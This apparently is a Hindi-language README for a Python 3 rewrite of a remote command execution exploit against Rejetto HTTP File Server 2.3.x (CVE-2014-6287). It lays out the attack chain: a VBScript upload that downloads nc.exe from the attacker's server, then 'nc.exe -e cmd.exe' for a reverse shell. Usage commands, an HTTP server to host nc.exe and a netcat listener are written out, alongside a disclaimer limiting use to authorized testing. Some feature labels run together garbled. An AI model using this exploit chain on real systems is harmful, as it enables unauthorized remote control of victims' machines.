
Rejetto HTTP File Server 2.3.x (CVE-2014-6287) के लिए रिमोट कमांड निष्पादन शोषण, आधुनिक आक्रामक सुरक्षा परीक्षण के लिए Python 3 में पुनर्लिखित।
यह क्लासिक रिमोट कमांड एक्ज़ीक्यूशन (RCE) एक्सप्लॉइट का Python 3 पुनर्लेखन है जो Rejetto HTTP File Server (HFS) v2.3.x को लक्षित करता है, जो CVE-2014-6287 के रूप में पहचानी गई कमजोरी का लाभ उठाता है।
मूल रूप से Avinash Kumar Thapa उर्फ "-Acid" द्वारा खोजा गया, यह संस्करण पोर्टेबिलिटी और उपयोगिता में सुधार करता है, पूर्ण पैरामीटराइजेशन और आधुनिक अनुकूलता प्रदान करता है।
यह टूल विशेष रूप से शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
nc.exe होस्ट करने के लिए उपयोग किया जाने वाला पोर्टnc.exe रिवर्स शेल वितरणnc.exe डाउनलोड करने के लिए एक VBScript अपलोड करेंnc.exe -e cmd.exe चलाएँpython3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
Example:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
Requirements:
- HTTP server serving nc.exe:
python3 -m http.server 8000
- Listener:
nc -lvnp 4444